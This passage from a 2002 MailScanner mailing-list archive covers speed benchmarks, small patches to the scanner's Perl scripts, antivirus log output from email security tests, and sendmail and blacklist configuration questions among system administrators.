version 3. Vrooommm, Vrrrooommmmm! :-) At 15:02 12/09/2002, you wrote: >This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. >It's not very fast by modern standards but was quite nice when I bought >it a few years ago... > >Version 3 processed 20,000 messages in 415.5 minutes. >This scales up to 69314 messages per day. > >Version 4 processes 20,000 messages in 130.3 minutes. >This scales up to 221028 messages per day. > >So version 4 ran 3.2 times faster than version 3 on the same hardware, >with the same MailScanner configuration, with the same 20,000 messages. > >Vrrrooooommmmmm........ >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From sevans at FOUNDATION.SDSU.EDU Tue Sep 24 17:33:03 2002 From: sevans at FOUNDATION.SDSU.EDU (Steve Evans) Date: Thu Jan 12 21:15:45 2006 Subject: Second speed test Message-ID: <6214C3F9233D764C9E7029396C3550153314E4@mail.foundation.sdsu.edu> Sorry guys, I meant to forward it to a co-worker not to you guys. Steve Evans (619) 594-0653 -----Original Message----- From: Steve Evans Sent: Tuesday, September 24, 2002 9:32 AM To: 'MailScanner mailing list' Subject: RE: Second speed test He's taken Version 4 from 3.2 times faster to 4.0 times faster. Steve Evans (619) 594-0653 -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Sunday, September 22, 2002 1:09 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Second speed test I have fixed a couple of bugs today, and it's now even faster. Same hardware as before, same configuration, same dataset. 4.00.0a3 processed 20,000 messages in 104.6 minutes. This scales up to 275,334 messages per day. So 4.00.0a3 ran 4.0 times fast than version 3. Vrooommm, Vrrrooommmmm! :-) At 15:02 12/09/2002, you wrote: >This test was done on a dual-CPU 1GHz Pentium 3 box with 512Mb RAM. >It's not very fast by modern standards but was quite nice when I bought >it a few years ago... > >Version 3 processed 20,000 messages in 415.5 minutes. >This scales up to 69314 messages per day. > >Version 4 processes 20,000 messages in 130.3 minutes. >This scales up to 221028 messages per day. > >So version 4 ran 3.2 times faster than version 3 on the same hardware, >with the same MailScanner configuration, with the same 20,000 messages. > >Vrrrooooommmmmm........ >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 17:53:03 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: <024401c263e7$d0ab2ef0$0101a8c0@jeroen> References: <009f01c26373$572fe260$8201a8c0@proaccessph.com> <5.1.0.14.2.20020924094156.048ef008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020924122541.06aa7a40@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020924175213.04b34970@imap.ecs.soton.ac.uk> I'll work on this tonight. The "not forking" and then stopping in debug mode is what it's supposed to do. It stays in the foreground, does 1 scan of the mail queue, processes what it finds and then stops. At 17:31 24/09/2002, you wrote: >Hello, > > > > >One thing I am wondering with, why does this eicar.com gfi test email >goes > > > >to my outlook express deleted items with a modified subject {VIRUS?} > > > >eicar.com [1/5] up to [5/5] and theres no warning message in the body >and > > > >the attachment is intact with the filename eicar.com. im just wondering > > > >about this. > > > > > > Can anyone else corroborate this? V3 should have deleted the entire > > > message in each of those cases. > >I have the same, I upgraded also from the rpm to version: mailscanner-3.23-1 > >When i put debugging on 1 and restart mailsccanner, mailscanner stops after >" In Debugging mode, not forking...". Is this normal ? > >When i run the :http://www.gfi.com/emailsecuritytest/ test and mailscanner >in debug mode i see this message in the logs, watch the Oh shit messages !: > >[root@mail etc]# cat /var/log/maillog |grep g8OEwF113849 >Sep 24 17:00:33 mail mailscanner[14094]: Detected Microsoft-specific >exploits in g8OEwF113849 >Sep 24 17:00:34 mail mailscanner[14094]: Found 16 viruses in messages >g8OEwC113748,g8OEwH113923,g8OEwK113991,g8OEwG113882,g8OEwG113866,g8OEwH11390 >9,g8OEwF113835,g8OEwD113772,g8OEwE113798,g8OEwJ113990,g8OEwF113849,g8OEwJ113 >977,g8OEwI113962,g8OEwF113814 >Sep 24 17:00:34 mail mailscanner[14094]: Oh shit, missed infected entity in >message :-( g8OEwF113849 >Sep 24 17:00:36 mail mailscanner[14094]: Saved entire message to >/var/spool/MailScanner/quarantine/20020924/g8OEwF113849 >Sep 24 17:05:27 mail mailscanner[15462]: Detected Microsoft-specific >exploits in g8OEwF113849 >Sep 24 17:05:28 mail mailscanner[15462]: Found 13 viruses in messages >g8OEwK113991,g8OEwG113882,g8OEwH113909,g8OEwF113835,g8OEwD113772,g8OEwE11379 >8,g8OEwJ113990,g8OEwF113849,g8OEwJ113977,g8OEwF113814,g8OEwI113962 >Sep 24 17:05:29 mail mailscanner[15462]: Oh shit, missed infected entity in >message :-( g8OEwF113849 >Sep 24 17:05:30 mail mailscanner[15462]: Saved entire message to >/var/spool/MailScanner/quarantine/20020924/g8OEwF113849 >Sep 24 17:05:34 mail sendmail[15711]: g8OEwF113849: to=jeroen, >delay=00:07:18, xdelay=00:00:00, mailer=local, pri=132087, dsn=2.0.0, >stat=Sent >Sep 24 17:05:52 mail mailscanner[15462]: Found 3 viruses in messages >g8OEwD113772,g8OEwE113798,g8OEwF113849 >[root@mail etc]# cat /var/log/maillog |grep g8OEwE113798 >Sep 24 17:00:33 mail mailscanner[14094]: Detected Microsoft-specific >exploits in g8OEwE113798 >Sep 24 17:00:34 mail mailscanner[14094]: Found 16 viruses in messages >g8OEwC113748,g8OEwH113923,g8OEwK113991,g8OEwG113882,g8OEwG113866,g8OEwH11390 >9,g8OEwF113835,g8OEwD113772,g8OEwE113798,g8OEwJ113990,g8OEwF113849,g8OEwJ113 >977,g8OEwI113962,g8OEwF113814 >Sep 24 17:00:34 mail mailscanner[14094]: Oh shit, missed infected entity in >message :-( g8OEwE113798 >Sep 24 17:00:35 mail mailscanner[14094]: Saved entire message to >/var/spool/MailScanner/quarantine/20020924/g8OEwE113798 >Sep 24 17:05:27 mail mailscanner[15462]: Detected Microsoft-specific >exploits in g8OEwE113798 >Sep 24 17:05:28 mail mailscanner[15462]: Found 13 viruses in messages >g8OEwK113991,g8OEwG113882,g8OEwH113909,g8OEwF113835,g8OEwD113772,g8OEwE11379 >8,g8OEwJ113990,g8OEwF113849,g8OEwJ113977,g8OEwF113814,g8OEwI113962 >Sep 24 17:05:29 mail mailscanner[15462]: Oh shit, missed infected entity in >message :-( g8OEwE113798 >Sep 24 17:05:29 mail mailscanner[15462]: Saved entire message to >/var/spool/MailScanner/quarantine/20020924/g8OEwE113798 >Sep 24 17:05:33 mail sendmail[15711]: g8OEwE113798: to=jeroen, >delay=00:07:19, xdelay=00:00:00, mailer=local, pri=130691, dsn=2.0.0, >stat=Sent >Sep 24 17:05:52 mail mailscanner[15462]: Found 3 viruses in messages >g8OEwD113772,g8OEwE113798,g8OEwF113849 >[root@mail etc]# > >Maybe this info is usefull to tackle the splitting message thing. > >Regards, > >Jeroen -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From andersan at LTKALMAR.SE Tue Sep 24 18:02:22 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:45 2006 Subject: SV: SV: SV: Fix in uvscan/autoupdate... fixed Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB51@lkl22.ltkalmar.se> Hi No one else but me seemed to have a prob so I put up my own ftp and realized it was the iptables that was blocking. Could connect but not do ls My bad and my apologeze for being a fool =) But I wonder one thing, would it be possible to get more info from the update accept "Running mcaffe" ex: updating succeded or failed? lockfile added/removed? maybe what/if dat-version was installed? Thanks for the help /Anders Hmmmm, I think I have to go home and start learning some perl =) > -----Ursprungligt meddelande----- > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > Skickat: den 24 september 2002 18:13 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: Re: SV: SV: Fix in uvscan/autoupdate > > > At 16:22 24/09/2002, you wrote: > >I did the patch but I still get the msg from line 57 > >- > >Mcafee update failed: cannot find the the update file, at > ./autoupdate line > >93 > > That error sounds like the ftp site timing out. The US site > is horribly > slow, the Europe site is much faster. Right near the top of > the script > there are 2 lines like this: > > #my($ftpsite) = 'ftpeur.nai.com'; # Use faster European > mirror instead of > my($ftpsite) = 'ftp.nai.com'; # busy US site > > Move the # from the start of 1 line to the start of the other > line and > you'll be using the European mirror site at ftpeur.nai.com. Then try > re-running it and you will probably find it works now. This > seems to have > been a problem for a few days now. > > >- > >I cant really read perl enough to understand whats wrong but > if anyone > >got an update file that work pls send it to me so I can try > > From my point of view I can only find 2 reasons for failure > >- missing some perl part like Net::FTP but then I think the script > > would bail out earlier? > >- something is wrong with paths in the script, my > installation of mcafee > >is in /usr/local/uvscan? > > > >I tried with f-prot and it works fine. So I thought maybe my comp > >was stupid so I did a try on another comp. There it starts without > >a bailout but it doesnt finish and no lookfile is writen to /tmp > >Any good or bad advice for me to try because Im lost. > > > >/Anders > > > > > -----Ursprungligt meddelande----- > > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > Skickat: den 23 september 2002 23:58 > > > Till: MAILSCANNER@JISCMAIL.AC.UK > > > ?mne: Re: SV: Fix in uvscan/autoupdate > > > > > > > > > At 17:59 23/09/2002, you wrote: > > > >As the bad perl knowledge I got I need to ask where these > > > >lines are supposed to be in the script? > > > > > > Around line 66 as it says at the start of the patch. > > > > > > > > > >/Anders > > > > > > > > > -----Ursprungligt meddelande----- > > > > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > > > > Skickat: den 23 september 2002 18:11 > > > > > Till: MAILSCANNER@JISCMAIL.AC.UK > > > > > ?mne: Fix in uvscan/autoupdate > > > > > > > > > > > > > > > There appears to have been a change in the syntax of the > > > McAfee uvscan > > > > > program, which means that the "autoupdate" script for it will > > > > > bail out with > > > > > a "no target specified for scanning" error. > > > > > > > > > > To fix this, just apply this tiny change to > uvscan/autoupdate (or > > > > > lib/mcafee-autoupdate in V4). > > > > > > > > > > --- autoupdate.old Mon Sep 23 11:01:01 2002 > > > > > +++ autoupdate Mon Sep 23 11:11:31 2002 > > > > > @@ -66,7 +66,7 @@ > > > > > # to see if the new dat's are o.k attempt to run mcafee > > > > > with them and > > > > > # check for errors > > > > > print STDERR "About to run mcafee\n"; > > > > > -open(MCAFEETEST, "$mcafee -d $mcafeeroot | "); > > > > > +open(MCAFEETEST, "$mcafee -d $mcafeeroot . | "); > > > > > print STDERR "Running mcafee\n"; > > > > > while(){ > > > > > chomp; > > > > > -- > > > > > Julian Field Teaching Systems Manager > > > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > > > Computer Science > > > > > Tel. 023 8059 2817 University of Southampton > > > > > Southampton SO17 1BJ > > > > > > > > > > > -- > > > Julian Field Teaching Systems Manager > > > jkf@ecs.soton.ac.uk Dept. of Electronics & > Computer Science > > > Tel. 023 8059 2817 University of Southampton > > > Southampton SO17 1BJ > > > > > -- > Julian Field Teaching Systems Manager > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ > From andersan at LTKALMAR.SE Tue Sep 24 18:05:45 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:45 2006 Subject: Last news...... Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB52@lkl22.ltkalmar.se> Hi Just thought I should tell you that my boss was impressed so asap I get new hardware where implementing MS at work. So thanks from me to Julian and all the others that done this nice app... /Anders From mailscanner at ecs.soton.ac.uk Tue Sep 24 18:25:14 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Last news...... In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB52@lkl22.ltkalmar.se > Message-ID: <5.1.0.14.2.20020924182455.04b6b8c8@imap.ecs.soton.ac.uk> At 18:05 24/09/2002, you wrote: >Hi >Just thought I should tell you that my boss was impressed so >asap I get new hardware where implementing MS at work. > >So thanks from me to Julian and all the others that >done this nice app... Please can you add something to the guest book if you haven't already... :-) Thanks! Jules. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 18:23:31 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: 3.23-1 swearing like a pirate... In-Reply-To: <0209241820320D.09429@prezzemolo.polito.it> References: <5.1.0.14.2.20020924095711.04ae9628@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020924095711.04ae9628@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020924182238.02e27910@imap.ecs.soton.ac.uk> Okay, sorted. You can either apply this patch to explode.pl or else give me 5 minutes and you can download 3.23-2. --- explode.pl.old Tue Sep 24 18:34:51 2002 +++ explode.pl Tue Sep 24 18:34:21 2002 @@ -343,7 +343,7 @@ for ($i=0; $i<@parts; $i++) { ($infectednum=$i),last if $parts[$i]==$infected; } - Log::WarnLog("Oh shit, missed infected entity in message :-( $MsgId"), return + Log::WarnLog("Oh bother, missed infected entity in message :-( $MsgId"), return if $infectednum<0; # Now to actually do something about it... @@ -420,6 +420,10 @@ $id, $filename, $basedir); + + # If we just replaced the entire message, don't try any more + # disinfecting (cleaning) on this message as it isn't there any more. + last if $file eq ""; } # Mark the message as disinfected, if the user wants us to At 17:20 24/09/2002, you wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >On Tuesday 24 September 2002 11:06, Julian Field wrote: > > At 03:12 24/09/2002, you wrote: > > >Julian, > > > I upgraded from 3.22-14 to 3.23-1 this afternoon and my syslog file > > >looks a wee bit more profane than before. I'm getting a lot of "oh shit" > > >complaints, eg: > > > > # Now to actually do something about it... > > > > Can you try sending yourself one and confirm whether MailScanner has > > actually disabled the Microsoft-specific exploit or not. I can't get it to > > go wrong on my system :-( > > > >I too have some swearing in the log file. It seems that when the antivirus >finds a virus in a message suffering from a Microsoft-specific exploit (in >these days, Klez), the message is triggered. > >I also noticed that in these cases the infected file, that used to linger in >the quarantine directory, is cancelled. >My quarantine directories are now almost empty, just containing the 'message' >files, besides a few exceptions for non-Klez viri. > >Maurizio > >- -- >______ > / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb > / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP > / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" > / I-10129 Torino (Italia) / dMP dMP dMP dMF > / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" >/ E-mail: munafo@polito.it /__________________________ >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1.0.6 (GNU/Linux) >Comment: For info see http://www.gnupg.org > >iD8DBQE9kJDQtgCCNnfQWWkRAm7/AJ9XH3j4qylEZaaAFEdK4Ip03BWVnACfVRTM >eUjJ4XKoep7RsUY7aXIkuZs= >=aQiX >-----END PGP SIGNATURE----- -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Tue Sep 24 18:24:38 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: Email Vulnerabilities In-Reply-To: <5.1.0.14.2.20020924175213.04b34970@imap.ecs.soton.ac.uk> References: <024401c263e7$d0ab2ef0$0101a8c0@jeroen> <009f01c26373$572fe260$8201a8c0@proaccessph.com> <5.1.0.14.2.20020924094156.048ef008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020924122541.06aa7a40@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020924182336.06a80b30@imap.ecs.soton.ac.uk> Bug sorted. Either apply this patch (only relevant to v3, not v4) or give me 5 minutes and you can download 3.23-2 --- explode.pl.old Tue Sep 24 18:34:51 2002 +++ explode.pl Tue Sep 24 18:34:21 2002 @@ -343,7 +343,7 @@ for ($i=0; $i<@parts; $i++) { ($infectednum=$i),last if $parts[$i]==$infected; } - Log::WarnLog("Oh shit, missed infected entity in message :-( $MsgId"), return + Log::WarnLog("Oh bother, missed infected entity in message :-( $MsgId"), return if $infectednum<0; # Now to actually do something about it... @@ -420,6 +420,10 @@ $id, $filename, $basedir); + + # If we just replaced the entire message, don't try any more + # disinfecting (cleaning) on this message as it isn't there any more. + last if $file eq ""; } # Mark the message as disinfected, if the user wants us to At 17:53 24/09/2002, you wrote: >I'll work on this tonight. > >The "not forking" and then stopping in debug mode is what it's supposed to do. >It stays in the foreground, does 1 scan of the mail queue, processes what >it finds and then stops. > >At 17:31 24/09/2002, you wrote: >>Hello, >> >> > > >One thing I am wondering with, why does this eicar.com gfi test email >>goes >> > > >to my outlook express deleted items with a modified subject {VIRUS?} >> > > >eicar.com [1/5] up to [5/5] and theres no warning message in the body >>and >> > > >the attachment is intact with the filename eicar.com. im just wondering >> > > >about this. >> > > >> > > Can anyone else corroborate this? V3 should have deleted the entire >> > > message in each of those cases. >> >>I have the same, I upgraded also from the rpm to version: mailscanner-3.23-1 >> >>When i put debugging on 1 and restart mailsccanner, mailscanner stops after >>" In Debugging mode, not forking...". Is this normal ? >> >>When i run the :http://www.gfi.com/emailsecuritytest/ test and mailscanner >>in debug mode i see this message in the logs, watch the Oh shit messages !: >> >>[root@mail etc]# cat /var/log/maillog |grep g8OEwF113849 >>Sep 24 17:00:33 mail mailscanner[14094]: Detected Microsoft-specific >>exploits in g8OEwF113849 >>Sep 24 17:00:34 mail mailscanner[14094]: Found 16 viruses in messages >>g8OEwC113748,g8OEwH113923,g8OEwK113991,g8OEwG113882,g8OEwG113866,g8OEwH11390 >>9,g8OEwF113835,g8OEwD113772,g8OEwE113798,g8OEwJ113990,g8OEwF113849,g8OEwJ113 >>977,g8OEwI113962,g8OEwF113814 >>Sep 24 17:00:34 mail mailscanner[14094]: Oh shit, missed infected entity in >>message :-( g8OEwF113849 >>Sep 24 17:00:36 mail mailscanner[14094]: Saved entire message to >>/var/spool/MailScanner/quarantine/20020924/g8OEwF113849 >>Sep 24 17:05:27 mail mailscanner[15462]: Detected Microsoft-specific >>exploits in g8OEwF113849 >>Sep 24 17:05:28 mail mailscanner[15462]: Found 13 viruses in messages >>g8OEwK113991,g8OEwG113882,g8OEwH113909,g8OEwF113835,g8OEwD113772,g8OEwE11379 >>8,g8OEwJ113990,g8OEwF113849,g8OEwJ113977,g8OEwF113814,g8OEwI113962 >>Sep 24 17:05:29 mail mailscanner[15462]: Oh shit, missed infected entity in >>message :-( g8OEwF113849 >>Sep 24 17:05:30 mail mailscanner[15462]: Saved entire message to >>/var/spool/MailScanner/quarantine/20020924/g8OEwF113849 >>Sep 24 17:05:34 mail sendmail[15711]: g8OEwF113849: to=jeroen, >>delay=00:07:18, xdelay=00:00:00, mailer=local, pri=132087, dsn=2.0.0, >>stat=Sent >>Sep 24 17:05:52 mail mailscanner[15462]: Found 3 viruses in messages >>g8OEwD113772,g8OEwE113798,g8OEwF113849 >>[root@mail etc]# cat /var/log/maillog |grep g8OEwE113798 >>Sep 24 17:00:33 mail mailscanner[14094]: Detected Microsoft-specific >>exploits in g8OEwE113798 >>Sep 24 17:00:34 mail mailscanner[14094]: Found 16 viruses in messages >>g8OEwC113748,g8OEwH113923,g8OEwK113991,g8OEwG113882,g8OEwG113866,g8OEwH11390 >>9,g8OEwF113835,g8OEwD113772,g8OEwE113798,g8OEwJ113990,g8OEwF113849,g8OEwJ113 >>977,g8OEwI113962,g8OEwF113814 >>Sep 24 17:00:34 mail mailscanner[14094]: Oh shit, missed infected entity in >>message :-( g8OEwE113798 >>Sep 24 17:00:35 mail mailscanner[14094]: Saved entire message to >>/var/spool/MailScanner/quarantine/20020924/g8OEwE113798 >>Sep 24 17:05:27 mail mailscanner[15462]: Detected Microsoft-specific >>exploits in g8OEwE113798 >>Sep 24 17:05:28 mail mailscanner[15462]: Found 13 viruses in messages >>g8OEwK113991,g8OEwG113882,g8OEwH113909,g8OEwF113835,g8OEwD113772,g8OEwE11379 >>8,g8OEwJ113990,g8OEwF113849,g8OEwJ113977,g8OEwF113814,g8OEwI113962 >>Sep 24 17:05:29 mail mailscanner[15462]: Oh shit, missed infected entity in >>message :-( g8OEwE113798 >>Sep 24 17:05:29 mail mailscanner[15462]: Saved entire message to >>/var/spool/MailScanner/quarantine/20020924/g8OEwE113798 >>Sep 24 17:05:33 mail sendmail[15711]: g8OEwE113798: to=jeroen, >>delay=00:07:19, xdelay=00:00:00, mailer=local, pri=130691, dsn=2.0.0, >>stat=Sent >>Sep 24 17:05:52 mail mailscanner[15462]: Found 3 viruses in messages >>g8OEwD113772,g8OEwE113798,g8OEwF113849 >>[root@mail etc]# >> >>Maybe this info is usefull to tackle the splitting message thing. >> >>Regards, >> >>Jeroen > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From munafo at PREZZEMOLO.POLITO.IT Tue Sep 24 18:39:27 2002 From: munafo at PREZZEMOLO.POLITO.IT (Maurizio Matteo Munafo') Date: Thu Jan 12 21:15:45 2006 Subject: 3.23-1 swearing like a pirate... In-Reply-To: <5.1.0.14.2.20020924182238.02e27910@imap.ecs.soton.ac.uk> References: <5.1.0.14.2.20020924095711.04ae9628@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020924182238.02e27910@imap.ecs.soton.ac.uk> Message-ID: <0209241939270F.09429@prezzemolo.polito.it> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Tuesday 24 September 2002 19:23, Julian Field wrote: > Okay, sorted. > > You can either apply this patch to explode.pl or else give me 5 minutes and > you can download 3.23-2. > Thanks. I will wait :) M. - -- ______ / Maurizio M. Munafo' / dMMMMMMMMb dMMMMb / Dip. di Elettronica - Politecnico di Torino / dMP"dMP"dMP "dMP / Corso Duca degli Abruzzi 24 / dMP dMP dMP dMMK" / I-10129 Torino (Italia) / dMP dMP dMP dMF / Tel: +39 011 5644128 Fax: +39 011 5644099 / dMP dMP dMP dMMMMP" / E-mail: munafo@polito.it /__________________________ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9kKNPtgCCNnfQWWkRAqzkAKDYA5DP096q2l7nLboDRys7mPOIywCcDmEb BwTnffpWUbOVK83/5T8Gnjc= =EIhE -----END PGP SIGNATURE----- From LISTSERV at JISCMAIL.AC.UK Tue Sep 24 18:09:15 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:45 2006 Subject: MAILSCANNER: Luis.F.Correia@SEG-SOCIAL.PT left the list Message-ID: <200209241709.SAA03956@magpie.ecs.soton.ac.uk> Tue, 24 Sep 2002 18:09:15 Luis.F.Correia@SEG-SOCIAL.PT has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Tue, 24 Sep 2002 18:09:14 +0100 Received: from gwmail2.seg-social.pt ([193.126.192.204]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8OH9Cr26583 for ; Tue, 24 Sep 2002 18:09:12 +0100 Received: from ssexch-00-imc2.seg-social (ssexch-00-imc2.seg-social.pt [172.26.5.22]) by gwmail2.seg-social.pt (8.11.6/8.9.3) with ESMTP id g8OI76L11334 for ; Tue, 24 Sep 2002 19:07:06 +0100 Received: by ssexch-00-imc2.seg-social.pt with Internet Mail Service (5.5.2653.19) id <341D1R44>; Tue, 24 Sep 2002 18:06:28 +0100 Message-ID: From: "Luis.F.Correia" To: "'L-Soft list server at JISCMAIL (1.8e)'" Subject: SIGNOFF * Date: Tue, 24 Sep 2002 18:06:26 +0100 Return-Receipt-To: "Luis.F.Correia" MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain From mailscanner at ecs.soton.ac.uk Tue Sep 24 18:34:50 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:45 2006 Subject: ANNOUNCE: Version 3.23-2 Message-ID: <5.1.0.14.2.20020924183338.06bcd128@imap.ecs.soton.ac.uk> Just 1 minor bug fix. Doesn't affect actual functionality, but stops the mail log swearing like a trooper. And yes, it really does fix the bug, not just change the log message... Download, as per usual, from www.mailscanner.info Jules. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From howard at harper-adams.ac.uk Tue Sep 24 18:56:46 2002 From: howard at harper-adams.ac.uk (Howard Robinson) Date: Thu Jan 12 21:15:45 2006 Subject: Sendmail question Message-ID: <200209241747.g8OHlUu03917@blackhole.harper-adams.ac.uk> Sorry this is a sendmail question but as there are many sendmail users in Mailscannerland may be one could answer the following question. I have two main groups on email users all on Novell server, Staff & Student. Staff rarely leave (I've been here in various guises for 18 years!!!), 25-33% of students leave and a similar number arrive each year. Is it possible to have two aliases files with one maintained separately from the other but being combined using newaliases? The :include: option looks to be a list service rather than 'include this file in aliases' command. Apologies if its very off topic. Regards Howard Robinson (Senior Technical Development Officer) Harper Adams University College Edgmond Newport Shropshire TF10 8NB UK E-mail: hrobinson@harper-adams.ac.uk Tel. : +44(0)1952 820280 Via switchboard : +44(0)1952 815253 Direct line Fax. : +44(0)1952 814783 College Web site http://www.harper-adams.ac.uk From mailscanner at ecs.soton.ac.uk Tue Sep 24 22:29:55 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:46 2006 Subject: Sendmail question In-Reply-To: <200209241747.g8OHlUu03917@blackhole.harper-adams.ac.uk> Message-ID: <5.1.0.14.2.20020924222740.024157a0@imap.ecs.soton.ac.uk> At 18:56 24/09/2002, you wrote: >I have two main groups on email users all on Novell server, Staff & >Student. Staff rarely leave (I've been here in various guises for 18 >years!!!), 25-33% of students leave and a similar number arrive >each year. Is it possible to have two aliases files with one >maintained separately from the other but being combined using >newaliases? >The :include: option looks to be a list service rather than 'include >this file in aliases' command. You can just list multiple alias files in your sendmail.cf file. Here's an example from our majordomo server # location of alias file #O AliasFile=/usr/local/sendmail/etc/aliases,nis:mail.aliases O AliasFile=/etc/aliases,/etc/majordomo.aliases,/usr/local/sendmail/etc/aliases,/opt/listextras/extras.aliases,nis:mail.aliases Note that the word wrapping is due to this email client. Clearly there should just be a single space between the "O" and "AliasFile". -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From gerry at DORFAM.CA Tue Sep 24 22:33:39 2002 From: gerry at DORFAM.CA (Gerry Doris) Date: Thu Jan 12 21:15:46 2006 Subject: Last news...... In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB52@lkl22.ltkalmar.se> Message-ID: On Tue, 24 Sep 2002, Anders Andersson, IT wrote: > Hi > Just thought I should tell you that my boss was impressed so > asap I get new hardware where implementing MS at work. I assume MS = MailScanner and not the other group in Redmond! -- Gerry "The lyfe so short, the craft so long to learne" Chaucer From hciss at HCIWS.COM Tue Sep 24 23:47:22 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: F-Prot Autoupdate References: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020924170947.068f5df8@imap.ecs.soton.ac.uk> Message-ID: <007301c2641c$5becc260$6701a8c0@matthew> > >Updated F-prot to latest version and also updated Mailscanner to latest 3.x > >release. Now it works. Is there anyway to copy it into the cron.daily > >directory? Being a perl script it likely won't work like that? > > Take a look at the cron.daily sophos.autoupdate script and you'll see how > to do it. I just took the autoupdate file you put in the F-Prot directory when Mailscanner installed and put it in the cron.daily directory renamed "autoupdate.pl". Will that work? Matt From hciss at HCIWS.COM Wed Sep 25 00:38:59 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's Message-ID: <008c01c26423$912d6720$6701a8c0@matthew> Apparently Mailscanner does not look at all the IP's when doing black hole lookups? I just got a piece of SPAM that was not tagged? Looked at the headers and the most recent hop before my server was not listed but the one before that was. Is there anyway to get Mailscanner to scan all the IP's in the headers except my own? Matt From mike at CAMAROSS.NET Wed Sep 25 00:46:16 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:46 2006 Subject: [Mailscanner] SpamCop IP's In-Reply-To: <008c01c26423$912d6720$6701a8c0@matthew> Message-ID: Is bl.spamcop the only blacklist you use? If so, you might want to add some more...I think I'm using 5 at the MTA level. -----Original Message----- From: MailScanner mailing list 